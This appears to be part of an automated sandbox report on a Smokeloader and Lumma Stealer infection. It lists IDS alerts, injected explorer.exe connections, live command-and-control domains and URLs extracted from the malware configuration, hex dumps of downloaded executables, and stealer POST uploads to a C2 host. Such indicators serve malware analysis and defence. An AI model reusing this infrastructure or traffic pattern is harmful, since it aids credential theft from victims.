                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.13.dr, softokn3.dll.13.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.13.dr, vcruntime140[1].dll.13.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.13.dr, msvcp140[1].dll.13.dr
                  Source: Binary string: nss3.pdb source: katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.13.dr, nss3.dll.13.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr
                  Source: Binary string: mozglue.pdb source: katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.13.dr, softokn3.dll.13.dr
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov eax, dword ptr [esi+00000910h]5_2_00427353
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]5_2_00427353
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov word ptr [eax], cx5_2_004168EF
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]5_2_00409960
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]5_2_00409960
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]5_2_00404970
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]5_2_00415FE1
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then dec edx5_2_0043B050
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h5_2_00417062
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]5_2_00417062
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]5_2_00426174
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov eax, dword ptr [esp+54h]5_2_004381BB
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]5_2_00426271
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]5_2_00426284
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]5_2_004102B2
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]5_2_004164D2
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov eax, 00008000h5_2_00403570
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then cmp cl, 0000002Eh5_2_00421580
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]5_2_004025A0
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then cmp byte ptr [ebp+00h], 00000000h5_2_00414660
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov edi, ebx5_2_00436670
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then movzx ebx, byte ptr [edx]5_2_00431680
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov eax, dword ptr [esp+000000C0h]5_2_004106B1
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov dword ptr [esp+000005F0h], 00000000h5_2_004138D2
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]5_2_004248E0
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov ecx, dword ptr [esi+30h]5_2_00423931
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov ecx, dword ptr [esi+30h]5_2_00423AD0
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then jmp edx5_2_00422AFB
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov eax, dword ptr [esp+4Ch]5_2_00415AFA
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]5_2_0040CB10
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]5_2_0040FBB4
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then jmp edx5_2_0041CCD0
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]5_2_00425CEE
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]5_2_00423C97
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]5_2_00433D0A
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then movzx esi, word ptr [ecx]5_2_00438F15
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]5_2_02156248
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then dec edx5_2_0217B2B7
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h5_2_021572C9
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]5_2_021572C9
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then cmp cl, 0000002Eh5_2_021612E0
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]5_2_021663DB
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then jmp edx5_2_0215D097
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then movzx esi, word ptr [ecx]5_2_0217917C
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]5_2_02156739
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov eax, 00008000h5_2_021437D7
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]5_2_021664D8
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]5_2_021664EB
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]5_2_02150519
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov eax, dword ptr [esi+00000910h]5_2_021675BA
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]5_2_021675BA
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov word ptr [eax], cx5_2_02156B56
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]5_2_02164B47
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov ecx, dword ptr [esi+30h]5_2_02163B98
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]5_2_02144BD7
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]5_2_02149BC7
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]5_2_02149BC7
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]5_2_02164B47
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]5_2_02142807
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov edi, ebx5_2_021768D7
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then cmp byte ptr [ebp+00h], 00000000h5_2_021548C7
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then movzx ebx, byte ptr [edx]5_2_021718E7
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov eax, dword ptr [esp+000000C0h]5_2_02150918
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]5_2_02173E13
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]5_2_0214FE1B
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]5_2_02163ECF
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]5_2_02163EFE
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then jmp dword ptr [004421CCh]5_2_0215CF1A
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]5_2_02165F55
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov ecx, dword ptr [esp+000000A0h]5_2_02161C89
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then jmp edx5_2_02162D5B
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]5_2_0214CD77
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 4x nop then mov eax, dword ptr [esp+4Ch]5_2_02155D61

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49711 -> 187.143.58.5:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49712 -> 187.143.58.5:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49713 -> 187.143.58.5:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49714 -> 187.143.58.5:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49715 -> 187.143.58.5:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49716 -> 187.143.58.5:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49718 -> 187.143.58.5:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49719 -> 187.143.58.5:80
                  Source: TrafficSnort IDS: 2052787 ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) 192.168.2.5:58021 -> 1.1.1.1:53
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49721 -> 187.143.58.5:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49723 -> 187.143.58.5:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49737 -> 187.143.58.5:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49739 -> 187.143.58.5:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49744 -> 187.143.58.5:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49773 -> 186.112.12.192:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49774 -> 186.112.12.192:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49775 -> 186.112.12.192:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49776 -> 186.112.12.192:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49777 -> 186.112.12.192:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49778 -> 186.112.12.192:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49779 -> 186.112.12.192:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49780 -> 186.112.12.192:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49781 -> 186.112.12.192:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49782 -> 186.112.12.192:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49783 -> 186.112.12.192:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49784 -> 186.112.12.192:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49785 -> 186.112.12.192:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49786 -> 186.112.12.192:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49787 -> 186.112.12.192:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49788 -> 186.112.12.192:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49789 -> 186.112.12.192:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49790 -> 186.112.12.192:80
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\explorer.exeNetwork Connect: 187.143.58.5 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 91.202.233.231 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.124 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 186.112.12.192 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 45.129.96.86 80Jump to behavior
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: boredimperissvieos.shop
                  Source: Malware configuration extractorURLs: holicisticscrarws.shop
                  Source: Malware configuration extractorURLs: sweetsquarediaslw.shop
                  Source: Malware configuration extractorURLs: plaintediousidowsko.shop
                  Source: Malware configuration extractorURLs: miniaturefinerninewjs.shop
                  Source: Malware configuration extractorURLs: zippyfinickysofwps.shop
                  Source: Malware configuration extractorURLs: obsceneclassyjuwks.shop
                  Source: Malware configuration extractorURLs: acceptabledcooeprs.shop
                  Source: Malware configuration extractorURLs: whispedwoodmoodsksl.shop
                  Source: Malware configuration extractorURLs: boredimperissvieos.shop
                  Source: Malware configuration extractorURLs: boredimperissvieos.shop
                  Source: Malware configuration extractorURLs: holicisticscrarws.shop
                  Source: Malware configuration extractorURLs: sweetsquarediaslw.shop
                  Source: Malware configuration extractorURLs: plaintediousidowsko.shop
                  Source: Malware configuration extractorURLs: miniaturefinerninewjs.shop
                  Source: Malware configuration extractorURLs: zippyfinickysofwps.shop
                  Source: Malware configuration extractorURLs: obsceneclassyjuwks.shop
                  Source: Malware configuration extractorURLs: acceptabledcooeprs.shop
                  Source: Malware configuration extractorURLs: whispedwoodmoodsksl.shop
                  Source: Malware configuration extractorURLs: boredimperissvieos.shop
                  Source: Malware configuration extractorURLs: holicisticscrarws.shop
                  Source: Malware configuration extractorURLs: sweetsquarediaslw.shop
                  Source: Malware configuration extractorURLs: plaintediousidowsko.shop
                  Source: Malware configuration extractorURLs: miniaturefinerninewjs.shop
                  Source: Malware configuration extractorURLs: zippyfinickysofwps.shop
                  Source: Malware configuration extractorURLs: obsceneclassyjuwks.shop
                  Source: Malware configuration extractorURLs: acceptabledcooeprs.shop
                  Source: Malware configuration extractorURLs: whispedwoodmoodsksl.shop
                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199689717899
                  Source: Malware configuration extractorURLs: http://dbfhns.in/tmp/index.php
                  Source: Malware configuration extractorURLs: http://guteyr.cc/tmp/index.php
                  Source: Malware configuration extractorURLs: http://greendag.ru/tmp/index.php
                  Source: Malware configuration extractorURLs: http://lobulraualov.in.net/tmp/index.php
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Sun, 26 May 2024 22:27:21 GMTContent-Type: application/octet-streamContent-Length: 325120Last-Modified: Sun, 26 May 2024 22:20:02 GMTConnection: keep-aliveETag: "6653b592-4f600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 83 01 00 64 00 00 00 00 e0 08 00 08 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 84 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 78 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 33 0b 01 00 00 10 00 00 00 0c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 6c 00 00 00 20 01 00 00 6e 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 46 07 00 00 90 01 00 00 ce 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 a8 00 00 00 e0 08 00 00 aa 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 May 2024 22:27:52 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 26 May 2024 22:23:46 GMTETag: "20ba00-61962daa50080"Accept-Ranges: bytesContent-Length: 2144768Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 66 09 00 00 50 17 00 00 00 00 00 60 75 09 00 00 10 00 00 00 80 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 21 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 09 00 3c 22 00 00 00 f0 0a 00 00 30 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0a 00 88 c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 c8 65 09 00 00 10 00 00 00 66 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 4c 2e 00 00 00 80 09 00 00 30 00 00 00 6a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d5 10 00 00 00 b0 09 00 00 00 00 00 00 9a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 3c 22 00 00 00 d0 09 00 00 24 00 00 00 9a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 00 0a 00 00 00 00 00 00 be 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 10 0a 00 00 02 00 00 00 be 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 88 c9 00 00 00 20 0a 00 00 ca 00 00 00 c0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 30 16 00 00 f0 0a 00 00 30 16 00 00 8a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 20 21 00 00 00 00 00 00 ba 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 23.145.40.124 23.145.40.124
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                  Source: Joe Sandbox ViewASN Name: UninetSAdeCVMX UninetSAdeCVMX
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: whispedwoodmoodsksl.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12830Host: whispedwoodmoodsksl.shop
